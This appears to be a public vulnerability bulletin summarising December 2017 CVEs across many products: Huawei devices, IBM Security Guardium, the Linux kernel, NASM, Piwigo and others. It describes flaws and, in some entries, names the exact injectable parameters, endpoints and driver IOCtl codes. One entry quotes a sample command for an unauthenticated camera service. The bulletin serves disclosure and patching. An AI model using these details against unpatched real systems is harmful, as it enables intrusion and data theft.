gpweb -- gpweb
Unrestricted File Upload vulnerability in GPWeb 8.4.61 allows remote authenticated users to upload any type of file, including a PHP shell.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-15876
Source & Patch Info: MISC
graphicsmagick -- graphicsmagick
In GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in ReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17782
Source & Patch Info: CONFIRM, CONFIRM

graphicsmagick -- graphicsmagick
In GraphicsMagick 1.3.27a, there is a buffer over-read in ReadPALMImage in coders/palm.c when QuantumDepth is 8.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17783
Source & Patch Info: CONFIRM, CONFIRM
h2o -- h2o
H2O version 2.2.3 and earlier allows remote attackers to cause a denial of service in the server via specially crafted HTTP/2 header.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-10908
Source & Patch Info: CONFIRM, JVN

h2o -- h2o
H2O version 2.2.2 and earlier allows remote attackers to cause a denial of service in the server via specially crafted HTTP/1 header.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-10868
Source & Patch Info: CONFIRM, JVN

h2o -- h2o
H2O version 2.2.3 and earlier allows remote attackers to cause a denial of service in the server via unspecified vectors.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-10872
Source & Patch Info: CONFIRM, JVN

h2o -- h2o
Buffer overflow in H2O version 2.2.2 and earlier allows remote attackers to cause a denial-of-service in the server via unspecified vectors.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-10869
Source & Patch Info: CONFIRM, JVN
heketi -- heketi
A security-check flaw was found in the way the Heketi 5 server API handled user requests. An authenticated Heketi user could send specially crafted requests to the Heketi server, resulting in remote command execution as the user running Heketi server and possibly privilege escalation.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-15103
Source & Patch Info: REDHAT, CONFIRM, CONFIRM

heketi -- heketi
An access flaw was found in Heketi 5, where the heketi.json configuration file was world readable. An attacker having local access to the Heketi server could read plain-text passwords from the heketi.json file.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-15104
Source & Patch Info: REDHAT, CONFIRM, CONFIRM, CONFIRM

horde_project -- groupware
In Horde Groupware through 5.2.22, SQL Injection exists via the group parameter to /services/prefs.php or the homePostalCode parameter to /turba/search.php.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17781
Source & Patch Info: MISC
huawei -- fusionsphere_openstack
Huawei FusionSphere OpenStack V100R006C000SPC102 (NFV) has an information leak vulnerability due to the use of a low version transmission protocol by default. An attacker could intercept packets transferred by a target device. Successful exploit could cause an information leak.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15321
Source & Patch Info: CONFIRM

huawei -- hg8245h
Huawei HG8245H version earlier than V300R018C00SPC110 has an authentication bypass vulnerability. An attacker can access a specific URL of the affected product. Due to improper verification of the privilege, successful exploitation may cause information leak.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15328
Source & Patch Info: MISC, MISC

huawei -- honor_8_smartphone
Huawei Honor 8 smartphone with software versions earlier than FRD-L04C567B389 and earlier than FRD-L14C567B389 have a permission control vulnerability due to improper authorization configuration on specific device information.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15307
Source & Patch Info: CONFIRM

huawei -- ireader
Huawei iReader app before 8.0.2.301 has an arbitrary file deletion vulnerability due to the lack of input validation. An attacker can exploit this vulnerability to delete specific files from the SD card.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15310
Source & Patch Info: CONFIRM

huawei -- ireader
Huawei iReader app before 8.0.2.301 has a path traversal vulnerability due to insufficient validation on file storage paths. An attacker can exploit this vulnerability to store downloaded malicious files in an arbitrary directory.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15309
Source & Patch Info: CONFIRM

huawei -- ireader
Huawei iReader app before 8.0.2.301 has an input validation vulnerability due to insufficient validation on the URL used for loading network data. An attacker can control app access and load malicious websites created by the attacker, and the code in webpages would be loaded and run.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15308
Source & Patch Info: CONFIRM

huawei -- mate_9_smartphone
The GPU driver of Mate 9 Huawei smart phones with software before MHA-AL00B 8.0.0.334(C00) and Mate 9 Pro Huawei smart phones with software before LON-AL00B 8.0.0.334(C00) has a memory double free vulnerability. An attacker tricks a user into installing a malicious application, and the application can call special API, which triggers double free and causes a system crash or arbitrary code execution.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15316
Source & Patch Info: CONFIRM

huawei -- multiple_smartphones
Some Huawei smartphones with software of BGO-L03C158B003CUSTC158D001 and BGO-L03C331B009CUSTC331D001 have a DoS vulnerability due to insufficient input validation. An attacker could exploit this vulnerability by sending specially crafted NFC messages to the target device. Successful exploit could make a service crash.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15322
Source & Patch Info: CONFIRM
huawei -- multiple_products
The baseband modules of Mate 10, Mate 10 Pro, Mate 9, Mate 9 Pro Huawei smart phones with software before ALP-AL00 8.0.0.120(SP2C00), before BLA-AL00 8.0.0.120(SP2C00), before MHA-AL00B 8.0.0.334(C00), and before LON-AL00B 8.0.0.334(C00) have a stack overflow vulnerability due to the lack of parameter validation. An attacker could send malicious packets to the smart phones within radio range by special wireless device, which leads to a stack overflow when the baseband module handles these packets. The attacker could exploit this vulnerability to perform a denial of service attack or remote code execution in baseband module.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15311
Source & Patch Info: CONFIRM

huawei -- multiple_products
RP200 V500R002C00, V600R006C00; TE30 V100R001C10, V500R002C00, V600R006C00; TE40 V500R002C00, V600R006C00; TE50 V500R002C00, V600R006C00; TE60 V100R001C10, V500R002C00, V600R006C00 have out-of-bounds read vulnerabilities in some Huawei products. Due to insufficient input validation, a remote attacker could exploit these vulnerabilities by sending specially crafted SS7 related packets to the target devices. Successful exploit will cause out-of-bounds read and possibly crash the system.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15318
Source & Patch Info: CONFIRM

huawei -- multiple_products
AR120-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR1200 V200R006C10, V200R006C13, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR1200-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR150 V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR150-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR160 V200R006C10, V200R006C12, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR200 V200R006C10, V200R007C00, V200R007C01, V200R008C20, V200R008C30; AR200-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR2200 V200R006C10, V200R006C13, V200R006C16, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR2200-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR3200 V200R006C10, V200R006C11, V200R007C00, V200R007C01, V200R007C02, V200R008C00, V200R008C10, V200R008C20, V200R008C30; AR510 V200R006C10, V200R006C12, V200R006C13, V200R006C15, V200R006C16, V200R006C17, V200R007C00, V200R008C20, V200R008C30; SRG1300 V200R006C10, V200R007C00, V200R007C02, V200R008C20, V200R008C30; SRG2300 V200R006C10, V200R007C00, V200R007C02, V200R008C20, V200R008C30; SRG3300 V200R006C10, V200R007C00, V200R008C20, V200R008C30 have an input validation vulnerability in Huawei multiple products. Due to the insufficient input validation, an unauthenticated, remote attacker may craft a malformed Stream Control Transmission Protocol (SCTP) packet and send it to the device, causing the device to read out of bounds and restart.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15317
Source & Patch Info: CONFIRM

huawei -- multiple_products
Huawei S12700 V200R006C00, V200R007C00, V200R007C01, V200R007C20, V200R008C00, V200R009C00, V200R010C00; S1700 V200R006C10, V200R009C00, V200R010C00; S2700 V200R006C00, V200R006C10, V200R007C00, V200R008C00, V200R009C00, V200R010C00, V200R011C00; S5700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, V200R010C00, V200R011C00; S6700 V200R005C00, V200R008C00, V200R009C00, V200R010C00; S7700 V200R006C00, V200R007C00, V200R008C00, V200R009C00, V200R010C0; S9700 V200R006C00, V200R007C00, V200R007C01, V200R008C00, V200R009C00, V200R010C00 have a DoS vulnerability due to insufficient validation of the Network Quality Analysis (NQA) packets. A remote attacker could exploit this vulnerability by sending malformed NQA packets to the target device. Successful exploitation could make the device restart.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15324
Source & Patch Info: CONFIRM

huawei -- multiple_products
RP200 V500R002C00, V600R006C00; TE30 V100R001C10, V500R002C00, V600R006C00; TE40 V500R002C00, V600R006C00; TE50 V500R002C00, V600R006C00; TE60 V100R001C10, V500R002C00, V600R006C00 have out-of-bounds read vulnerabilities in some Huawei products. Due to insufficient input validation, a remote attacker could exploit these vulnerabilities by sending specially crafted SS7 related packets to the target devices. Successful exploit will cause out-of-bounds read and possibly crash the system.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15319
Source & Patch Info: CONFIRM

huawei -- multiple_products
RP200 V500R002C00, V600R006C00; TE30 V100R001C10, V500R002C00, V600R006C00; TE40 V500R002C00, V600R006C00; TE50 V500R002C00, V600R006C00; TE60 V100R001C10, V500R002C00, V600R006C00 have out-of-bounds read vulnerabilities in some Huawei products. Due to insufficient input validation, a remote attacker could exploit these vulnerabilities by sending specially crafted SS7 related packets to the target devices. Successful exploit will cause out-of-bounds read and possibly crash the system.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15320
Source & Patch Info: CONFIRM

huawei -- smartcare
Huawei SmartCare V200R003C10 has a stored XSS (cross-site scripting) vulnerability in the dashboard module. A remote authenticated attacker could exploit this vulnerability to inject malicious scripts in the affected device.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15312
Source & Patch Info: CONFIRM

huawei -- smartcare
Huawei SmartCare V200R003C10 has a CSV injection vulnerability. A remote authenticated attacker could inject malicious CSV expression to the affected device.
Published: 2017-12-22 | CVSS Score: not yet calculated | CVE-2017-15313
Source & Patch Info: CONFIRM
ibm -- business_process_manager
IBM Business Process Manager 8.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 128692.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1494
Source & Patch Info: CONFIRM, BID, MISC

ibm -- integration_bus
IBM Integration Bus 9.0 and 10.0 transmits user credentials in clear text which can be read by an attacker using man in the middle techniques. IBM X-Force ID: 134165.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1694
Source & Patch Info: CONFIRM, MISC

ibm -- jazz_for_service_management
IBM Jazz for Service Management (IBM Tivoli Components 1.1.3) is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 133140.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1631
Source & Patch Info: CONFIRM, MISC

ibm -- jazz_for_service_management
IBM Jazz for Service Management (IBM Tivoli Components 1.1.3) is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 135519.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1746
Source & Patch Info: CONFIRM, MISC

ibm -- qradar
IBM QRadar 7.2 and 7.3 could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 134178.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1696
Source & Patch Info: CONFIRM, MISC

ibm -- robotic_process_automation
IBM Robotic Process Automation with Automation Anywhere 10.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 135546.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1751
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 135858.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1757
Source & Patch Info: CONFIRM, MISC

ibm -- websphere_portal
IBM WebSphere Portal 8.5 and 9.0 exposes backend server URLs that are configured for usage by the Web Application Bridge component. IBM X-Force ID: 127476.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1423
Source & Patch Info: SECTRACK, MISC, CONFIRM
ibm -- security_guardium
IBM Security Guardium 10.0 specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. IBM X-Force ID: 124741.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1266
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 does not renew a session variable after a successful authentication which could lead to session fixation/hijacking vulnerability. This could force a user to utilize a cookie that may be known to an attacker. IBM X-Force ID: 124745.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1270
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 Database Activity Monitor could allow a local attacker to obtain highly sensitive information via unspecified vectors. IBM X-Force ID: 132550.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1596
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 Database Activity Monitor is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132613.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1600
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 124736.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1261
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 Database Activity Monitor uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 132611.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1598
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. IBM X-Force ID: 124737.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1262
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 Database Activity Monitor could allow a local attacker to obtain highly sensitive information via unspecified vectors. IBM X-Force ID: 132549.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1595
Source & Patch Info: CONFIRM, MISC

ibm -- security_guardium
IBM Security Guardium 10.0 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 124684.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-1257
Source & Patch Info: CONFIRM, MISC
ichano -- athome_ip_camera_devices
An issue was discovered on Ichano AtHome IP Camera devices. The device runs the "noodles" binary - a service on port 1300 that allows a remote (LAN) unauthenticated user to run arbitrary commands. This binary requires the "system" XML element for specifying the command. For example, a <system>id</system> command results in a <system_ack>ok</system_ack> response.
Published: 2017-12-19 | CVSS Score: not yet calculated | CVE-2017-17761
Source & Patch Info: MISC
ikarus -- ikarus
In IKARUS anti.virus 2.16.20, the driver file (ntguard.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x83000084.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17804
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus 2.16.20, the driver file (ntguard.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x83000088.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17795
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x830000c4, a related issue to CVE-2017-17113.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14968
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x830000cc.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14965
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x830000c0.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14966
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus 2.16.20, the driver file (ntguard.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x83000058.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17797
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x8300005c.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14964
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x83000084, a related issue to CVE-2017-17114.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14969
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Out of Bounds Write vulnerability because of not validating input values from IOCtl 0x83000058, a related issue to CVE-2017-17112.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14962
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x83000080.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14967
Source & Patch Info: MISC

ikarus -- ikarus
In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x83000058.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14963
Source & Patch Info: MISC
jbpm_kie_workbench -- jbpm_kie_workbench
 
Multiple cross-site scripting (XSS) vulnerabilities in JBPM KIE Workbench 6.0.x allow remote authenticated users to inject arbitrary web script or HTML via vectors related to task name html inputs.2017-12-19not yet calculatedCVE-2013-6465
CONFIRM
CONFIRM
CONFIRM
kemp -- application_firewall_pack
 
The Application Firewall Pack (AFP, aka Web Application Firewall) component on Kemp Load Balancer devices with software before 7.2.40.1 allows a Security Feature Bypass via an HTTP POST request.2017-12-18not yet calculatedCVE-2017-15524
BUGTRAQ
CONFIRM
MISC
linux -- linux_kernel
 
The Salsa20 encryption algorithm in the Linux kernel before 4.14.8 does not correctly handle zero-length inputs, allowing a local attacker able to use the AF_ALG-based skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a denial of service (uninitialized-memory free and kernel crash) or have unspecified other impact by executing a crafted sequence of system calls that use the blkcipher_walk API. Both the generic implementation (crypto/salsa20_generic.c) and x86 implementation (arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.2017-12-20not yet calculatedCVE-2017-17805
CONFIRM
CONFIRM
CONFIRM
linux -- linux_kernel
 
The HMAC implementation (crypto/hmac.c) in the Linux kernel before 4.14.8 does not validate that the underlying cryptographic hash algorithm is unkeyed, allowing a local attacker able to use the AF_ALG-based hash interface (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm (CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by executing a crafted sequence of system calls that encounter a missing SHA-3 initialization.2017-12-20not yet calculatedCVE-2017-17806
CONFIRM
CONFIRM
CONFIRM
linux -- linux_kernel
 
The KEYS subsystem in the Linux kernel before 4.14.6 omitted an access-control check when adding a key to the current task's "default request-key keyring" via the request_key() system call, allowing a local user to use a sequence of crafted system calls to add keys to a keyring with only Search permission (not Write permission) to that keyring, related to construct_get_dest_keyring() in security/keys/request_key.c.2017-12-20not yet calculatedCVE-2017-17807
CONFIRM
CONFIRM
CONFIRM
linux -- linux_kernel
 
The KVM implementation in the Linux kernel through 4.14.7 allows attackers to cause a denial of service (write_mmio stack-based out-of-bounds read) or possibly have unspecified other impact, related to arch/x86/kvm/x86.c and include/trace/events/kvm.h.2017-12-18not yet calculatedCVE-2017-17741
MISC
lyncsys -- wvbr0
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges. Was ZDI-CAN-4892.2017-12-21not yet calculatedCVE-2017-17411
MISC
maccms -- maccms 
 
Maccms 8.x allows remote command execution via the wd parameter in an index.php?m=vod-search request.2017-12-18not yet calculatedCVE-2017-17733
MISC
maplesoft -- maple_t.a.
 
A Reflected XSS Vulnerability affects the forgotten password page of Maplesoft Maple T.A. 2016.0.6 (Customer Hosted) via the emailAddress parameter to passwordreset/PasswordReset.do, aka Open Bug Bounty ID OBB-286688.2017-12-16not yet calculatedCVE-2017-14134
MISC
meinberg -- lantime
 
The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote attackers to read arbitrary files by leveraging failure to restrict URL access.2017-12-15not yet calculatedCVE-2017-16787
FULLDISC
EXPLOIT-DB
meinberg -- lantime
 
The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with certain privileges to read arbitrary files via (1) the ntpclientcounterlogfile parameter to cgi-bin/mainv2 or (2) vectors involving curl support of the "file" schema in the firmware update functionality.2017-12-19not yet calculatedCVE-2017-16786
MISC
FULLDISC
micro_focus -- operations_manager_i
 
Cross-Site Scripting (XSS) vulnerability has been identified in Micro Focus Operations Manager i, versions 10.60, 10.61, 10.62. The vulnerability could be remotely exploited to allow Cross-Site Scripting (XSS).2017-12-21not yet calculatedCVE-2017-14363
CONFIRM
moxa -- credentials_management
 
A Credentials Management issue was discovered in Moxa NPort W2150A versions prior to 1.11, and NPort W2250A versions prior to 1.11. The default password is empty on the device. An unauthorized user can access the device without a password. An unauthorized user has the ability to completely compromise the confidentiality and integrity of the wireless traffic.2017-12-21not yet calculatedCVE-2017-16727
BID
MISC
mt4_networks -- senhasegura
 
A Session Fixation Vulnerability exists in the MT4 Networks SenhaSegura Web Application 2.2.23.8 via login_if.php.2017-12-18not yet calculatedCVE-2017-11562
MISC
netapp -- clustered_data_ontap
 
NetApp Clustered Data ONTAP versions 9.x prior to 9.1P10 and 9.2P2 are susceptible to a vulnerability which allows an attacker to cause a Denial of Service (DoS) in SMB environments.2017-12-18not yet calculatedCVE-2017-14583
CONFIRM
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in the pp_list_one_macro function in asm/preproc.c that will cause a remote denial of service attack, related to mishandling of line-syntax errors.2017-12-20not yet calculatedCVE-2017-17813
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in pp_verror in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17817
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a heap-based buffer overflow that will cause a remote denial of service attack, related to a strcpy in paste_tokens in asm/preproc.c, a similar issue to CVE-2017-11111.2017-12-20not yet calculatedCVE-2017-17811
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a "SEGV on unknown address" that will cause a remote denial of service attack, because asm/preproc.c mishandles macro calls that have the wrong number of arguments.2017-12-20not yet calculatedCVE-2017-17810
MISC
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in pp_getline in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17816
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a heap-based buffer over-read in the function detoken() in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17812
MISC
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a heap-based buffer over-read that will cause a remote denial of service attack, related to a while loop in paste_tokens in asm/preproc.c.2017-12-20not yet calculatedCVE-2017-17818
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in pp_list_one_macro in asm/preproc.c that will lead to a remote denial of service attack, related to mishandling of operand-type errors.2017-12-20not yet calculatedCVE-2017-17820
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is an illegal address access in the function find_cc() in asm/preproc.c that will cause a remote denial of service attack, because pointers associated with skip_white_ calls are not validated.2017-12-20not yet calculatedCVE-2017-17819
MISC
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in do_directive in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17814
MISC
netwide_assembler -- netwide_assembler
 
In Netwide Assembler (NASM) 2.14rc0, there is an illegal address access in is_mmacro() in asm/preproc.c that will cause a remote denial of service attack, because of a missing check for the relationship between minimum and maximum parameter counts.2017-12-20not yet calculatedCVE-2017-17815
MISC
MISC
open_ticket_request_system -- open_ticket_request_system
 
Open Ticket Request System (OTRS) 4.0.x before 4.0.28, 5.0.x before 5.0.26, and 6.0.x before 6.0.3, when cookie support is disabled, might allow remote attackers to hijack web sessions and consequently gain privileges via a crafted email.2017-12-20not yet calculatedCVE-2017-17476
CONFIRM
CONFIRM
CONFIRM
CONFIRM
openldap -- openldap
 
contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.2017-12-18not yet calculatedCVE-2017-17740
MISC
phpscriptsmall.com -- paid_to_read_script
 
Paid To Read Script 2.0.5 has SQL injection via the referrals.php id parameter.2017-12-19not yet calculatedCVE-2017-17779
MISC
phpscriptsmall.com -- paid_to_read_script
 
Paid To Read Script 2.0.5 has SQL Injection via the admin/userview.php uid parameter, the admin/viewemcamp.php fnum parameter, or the admin/viewvisitcamp.php fn parameter.2017-12-18not yet calculatedCVE-2017-17651
MISC
EXPLOIT-DB
phpscriptsmall.com -- paid_to_read_script
 
Paid To Read Script 2.0.5 has XSS via the referrals.php tier parameter or the admin/userview.php uid parameter.2017-12-19not yet calculatedCVE-2017-17778
MISC
phpscriptsmall.com -- paid_to_read_script
 
Paid To Read Script 2.0.5 has authentication bypass in the admin panel via a direct request, as demonstrated by the admin/viewvisitcamp.php fn parameter and the admin/userview.php uid parameter.2017-12-19not yet calculatedCVE-2017-17777
MISC
phpscriptsmall.com -- paid_to_read_script
 
Paid To Read Script 2.0.5 has full path disclosure via an invalid admin/userview.php uid parameter.2017-12-19not yet calculatedCVE-2017-17776
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 
Readymade Video Sharing Script 3.2 has HTML Injection via the single-video-detail.php comment parameter.2017-12-18not yet calculatedCVE-2017-17649
MISC
EXPLOIT-DB
piwigo -- piwigo
 
Piwigo 2.9.2 is vulnerable to Cross-Site Request Forgery via /admin.php?page=configuration&section=main or /admin.php?page=batch_manager&mode=unit. An attacker can exploit this to coerce an admin user into performing unintended actions.2017-12-20not yet calculatedCVE-2017-17827
MISC
MISC
MISC
piwigo -- piwigo
 
The Configuration component of Piwigo 2.9.2 is vulnerable to Persistent Cross Site Scripting via the gallery_title parameter in an admin.php?page=configuration&section=main request. An attacker can exploit this to hijack a client's browser along with the data stored in it.2017-12-20not yet calculatedCVE-2017-17826
MISC
piwigo -- piwigo
 
The Batch Manager component of Piwigo 2.9.2 is vulnerable to Persistent Cross Site Scripting via tags-* array parameters in an admin.php?page=batch_manager&mode=unit request. An attacker can exploit this to hijack a client's browser along with the data stored in it.2017-12-20not yet calculatedCVE-2017-17825
MISC
piwigo -- piwigo
 
The Batch Manager component of Piwigo 2.9.2 is vulnerable to SQL Injection via the admin/batch_manager_unit.php element_ids parameter in unit mode. An attacker can exploit this to gain access to the data in a connected MySQL database.2017-12-20not yet calculatedCVE-2017-17824
MISC
MISC
MISC
piwigo -- piwigo
 
The Configuration component of Piwigo 2.9.2 is vulnerable to SQL Injection via the admin/configuration.php order_by array parameter. An attacker can exploit this to gain access to the data in a connected MySQL database.2017-12-20not yet calculatedCVE-2017-17823
MISC
MISC
MISC
piwigo -- piwigo
 
The List Users API of Piwigo 2.9.2 is vulnerable to SQL Injection via the /admin/user_list_backend.php sSortDir_0 parameter. An attacker can exploit this to gain access to the data in a connected MySQL database.2017-12-20not yet calculatedCVE-2017-17822
MISC
MISC
MISC
piwigo -- piwigo
 
Piwigo 2.9.2 has XSS via the name parameter in an admin.php?page=album-3-properties request.2017-12-19not yet calculatedCVE-2017-17775
MISC
piwigo -- piwigo
 
